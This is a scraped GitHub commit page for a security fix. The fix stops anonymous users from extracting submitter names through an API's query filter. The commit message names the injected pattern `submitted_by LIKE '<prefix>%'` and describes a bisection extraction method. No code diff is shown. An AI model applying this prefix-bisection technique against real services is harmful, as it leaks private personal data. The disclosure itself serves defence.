-
Notifications
You must be signed in to change notification settings - Fork 9
Commit
This commit does not belong to any branch on this repository, and may belong to a fork outside of the repository.
Security fix: Anonymous users must not leak submitter names
The arbitrary jsonquery feature now needs to be explicitly enabled for routes and is only ever allowed for authenticated users (because they currently have access to all data anyway). For the /api/documents route, we manually parse and validate the query and build it from scratch for unauthenticated users, *without* reverting to jsonquery. Before, it was possible to efficiently extract submitted_by names by applying restrictions in the form of `submitted_by LIKE '<prefix>%' to the /api/documents route. A proof of concept exploit has been developed using a bisection algorithm (interval halfing) that extracts submitter names of arbitrary protocols (even those that have not been validated yet) in a matter of seconds.
- Loading branch information
Showing
5 changed files
with
70 additions
and
17 deletions.
There are no files selected for viewing
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters